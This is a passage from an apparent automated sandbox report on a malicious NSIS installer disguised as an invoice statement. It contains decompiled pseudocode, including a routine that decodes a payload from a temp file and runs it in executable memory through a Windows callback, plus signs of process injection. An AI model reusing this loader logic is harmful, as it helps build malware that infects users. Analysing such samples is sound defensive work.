GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe,00000400), ref: 00402C8B

Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe,80000000,00000003), ref: 00405760
Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe,C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe,80000000,00000003), ref: 00402CD4
GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B

Strings

soft, xrefs: 00402D4B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
Inst, xrefs: 00402D42
"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" , xrefs: 00402C68
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
Error launching installer, xrefs: 00402CAB
Null, xrefs: 00402D54
C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-3699255861
Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\jones\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\jones\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x0040264e
0x0040264e
0x0040287d
0x00402880
0x00402880
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x00402886
0x00402886
0x00402886
0x00401833
0x00401833
0x00401834
0x00401492
0x00402200
0x00402200
0x00402200
0x00401831
0x0040182a
0x00402888
0x0040288c
0x0040288c
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x004021fb
0x00000000
0x004021fb
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,znrugtwz,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,znrugtwz,znrugtwz,00000000,00000000,znrugtwz,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

znrugtwz, xrefs: 00401750, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp, xrefs: 00401761
C:\Users\user\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll, xrefs: 00401801, 0040181D
C:\Users\user\AppData\Local\Temp\nslEC79.tmp, xrefs: 0040177E, 004017ED, 0040180B

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nslEC79.tmp$C:\Users\user\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll$znrugtwz
API String ID: 1941528284-3256649507
Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE

Uniqueness

Uniqueness Score: -1.00%

Function 1AC70FF5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 1AC71139
GetThreadContext.KERNELBASE(?,00010007), ref: 1AC7115C

Strings

D, xrefs: 1AC710C2

Memory Dump Source

Source File: 00000001.00000002.678689283.000000001AC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 1AC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1ac70000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: ContextCreateProcessThread
String ID: D
API String ID: 2843130473-2746444292
Opcode ID: c4b4d606db87a10af8c0631e15c7697e86df8964d14e9bb606d2c09976ef1b22
Instruction ID: 8f27486ad3e8ac1e4d9286a71ea5876067a3676ee243c85d63cb43d517375bf8
Opcode Fuzzy Hash: c4b4d606db87a10af8c0631e15c7697e86df8964d14e9bb606d2c09976ef1b22
Instruction Fuzzy Hash: B9A1B375E00249EFDB50DFE5C980BAEBBB6AF48345F1044A5E515EB2A1E730AE41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00402F01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f06
0x00402f10
0x00402f19
0x00402f1d
0x00402f28
0x00402f28
0x00402f30
0x00402f32
0x00402f39
0x00402f55
0x00402f59
0x00403022
0x00403022
0x00000000
0x00402f68
0x00402f6b
0x00402f71
0x00402f78
0x00402f7b
0x00402f84
0x00402ff1
0x00402ff7
0x00402ff9
0x00402ff9
0x0040300b
0x0040300f
0x00000000
0x00403011
0x00403011
0x00403014
0x0040301a
0x00000000
0x0040301a
0x00402f86
0x00402f89
0x0040301d
0x0040301d
0x00402f8f
0x00402f94
0x00402f94
0x00402f9c
0x00402f9e
0x00402f9e
0x00402faf
0x00402fb3
0x00000000
0x00000000
0x00402fc7
0x00402fcf
0x00402fed
0x00403024
0x00403024
0x00402fd6
0x00402fd6
0x00402fd9
0x00402fdc
0x00402fdf
0x00402fe9
0x00000000
0x00402feb
0x00000000
0x00402feb
0x00402fe9
0x00000000
0x00402fcf
0x00000000
0x00402f94
0x00402f89
0x00402f84
0x00402f7b
0x00402f59
0x00403025
0x00403029

APIs

SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7

Strings

80A, xrefs: 00402F8F

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: File$Read$PointerWrite
String ID: 80A
API String ID: 2113905535-195308239
Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69

Uniqueness

Uniqueness Score: -1.00%

Function 728A103A Relevance: 10.6, APIs: 7, Instructions: 108
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E728A103A(void* __ecx, void* __edx) {
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				long _v28;
				short _v1068;
				short _t17;
				short _t18;
				short _t19;
				short _t20;
				short _t21;
				short _t22;
				void* _t24;
				void* _t32;
				_Unknown_base(*)()* _t34;
				int _t37;
				long _t49;
				void* _t53;
				_Unknown_base(*)()* _t59;
				long _t61;
				void* _t63;

				_t17 = 0x79;
				_v24 = _t17;
				_t61 = 0x17d78400;
				_v22 = _t17;
				_v20 = _t17;
				_t18 = 0x76;
				_v18 = _t18;
				_t19 = 0x6f;
				_v16 = _t19;
				_t20 = 0x6b;
				_v14 = _t20;
				_t21 = 0x6d;
				_v12 = _t21;
				_t22 = 0x62;
				_v10 = _t22;
				_v8 = 0;
				_t24 = VirtualAlloc(0, 0x17d78400, 0x3000, 4); // executed
				if(_t24 == 0) {
					return 0;
				} else {
					do {
						 *_t24 = 0;
						_t24 = _t24 + 1;
						_t61 = _t61 - 1;
					} while (_t61 != 0);
					GetTempPathW(0x103,  &_v1068);
					E728A1000( &_v1068,  &_v24);
					_t32 = CreateFileW( &_v1068, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t63 = _t32;
					_t49 = GetFileSize(_t63, 0);
					_t34 = VirtualAlloc(0, _t49, 0x3000, 0x40); // executed
					_t59 = _t34;
					ReadFile(_t63, _t59, _t49,  &_v28, 0); // executed
					_t53 = 0;
					if(_t49 != 0) {
						do {
							 *((char*)(_t53 + _t59)) = ((( *((intOrPtr*)(_t53 + _t59)) + 0x00000001 ^ 0x000000f8) - 0x00000044 ^ 0x0000006e) - 0x00000034 ^ 0x000000d0) - 0x29;
							_t53 = _t53 + 1;
						} while (_t53 < _t49);
					}
					_t37 = EnumResourceTypesA(0, _t59, 0); // executed
					return _t37;
				}
			}

0x728a1048
0x728a104b
0x728a104f
0x728a1054
0x728a105a
0x728a105e
0x728a1067
0x728a106b
0x728a106e
0x728a1072
0x728a1075
0x728a1079
0x728a107c
0x728a1080
0x728a1088
0x728a1090
0x728a1094
0x728a1098
0x728a4cbd
0x728a109e
0x728a109e
0x728a109e
0x728a10a0
0x728a10a1
0x728a10a1
0x728a10b2
0x728a10c3
0x728a10e1
0x728a10e7
0x728a10f8
0x728a10fd
0x728a1101
0x728a110a
0x728a1110
0x728a1114
0x728a1116
0x728a1127
0x728a112a
0x728a112b
0x728a1116
0x728a1134
0x728a1140
0x728a1140

APIs

VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 728A1094
GetTempPathW.KERNEL32(00000103,?), ref: 728A10B2
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 728A10E1
GetFileSize.KERNEL32(00000000,00000000), ref: 728A10EB
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 728A10FD
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 728A110A
EnumResourceTypesA.KERNEL32(00000000,00000000,00000000), ref: 728A1134

Memory Dump Source

Source File: 00000001.00000002.678913640.00000000728A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 728A0000, based on PE: true

Associated: 00000001.00000002.678898056.00000000728A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.678929380.00000000728A5000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_728a0000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: File$AllocVirtual$CreateEnumPathReadResourceSizeTempTypes
String ID:
API String ID: 2006121276-0
Opcode ID: d15a6f243a3288b1049528574667851fafc5f62b209d38c721c3f0cb60057011
Instruction ID: d131bab75e0728c9eaa54b68db4facc661aa9eea195d666bd31e296713c1da83
Opcode Fuzzy Hash: d15a6f243a3288b1049528574667851fafc5f62b209d38c721c3f0cb60057011
Instruction Fuzzy Hash: F731E276A4434879FB1046F19C56FAF777DEF00B14F10146AF605EB1C0DAA64A8287B5

Uniqueness

Uniqueness Score: -1.00%

Function 0040302C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x417fb
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					_t12 =  *0x417040; // 0x3dd0a
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						_t22 =  *0x41f048; // 0x3f69
						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
						E00402BC5(0);
					}
					 *0x40afd0 = 0x40b038;
					 *0x40afd4 = 0x8000; // executed
					_t16 = E00405E9D(0x40afb0); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd0; // 0x40efa1
					_t40 = _t39 - 0x40b038;
					if(_t40 == 0) {
						__eflags =  *0x40afcc; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x41703c; // 0x417fb
						if(_t18 -  *0x40afa8 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409014, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afa8 =  *0x40afa8 + _t40;
						_t53 =  *0x40afcc; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

0x00403030
0x0040303d
0x00403050
0x00403055
0x00403196
0x00403198
0x00000000
0x0040319e
0x00403061
0x00403074
0x0040307a
0x00403080
0x0040308b
0x0040308b
0x00403090
0x00403095
0x0040309d
0x0040309f
0x0040309f
0x004030a8
0x004030af
0x00000000
0x00000000
0x004030b5
0x004030bb
0x004030c1
0x00000000
0x004030c7
0x004030cd
0x004030d7
0x004030ed
0x004030f2
0x004030f7
0x004030fd
0x00403103
0x0040310d
0x00403114
0x00000000
0x00000000
0x00403116
0x0040311c
0x0040311e
0x00403152
0x00403158
0x00000000
0x00000000
0x0040315a
0x0040315c
0x00000000
0x00000000
0x0040315e
0x0040315e
0x00403171
0x00000000
0x00000000
0x00403180
0x00000000
0x00403180
0x0040312e
0x00403136
0x0040318d
0x00403193
0x00403193
0x00000000
0x0040313e
0x0040313e
0x00403144
0x0040314a
0x00000000
0x00000000
0x00000000
0x00403150
0x00403191
0x00403191
0x00000000
0x00403191
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403041

Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
WriteFile.KERNELBASE(0040B038,0040EFA1,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
SetFilePointer.KERNELBASE(000417FB,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180

Strings

80A, xrefs: 004030A1

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: 80A
API String ID: 2146148272-195308239
Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
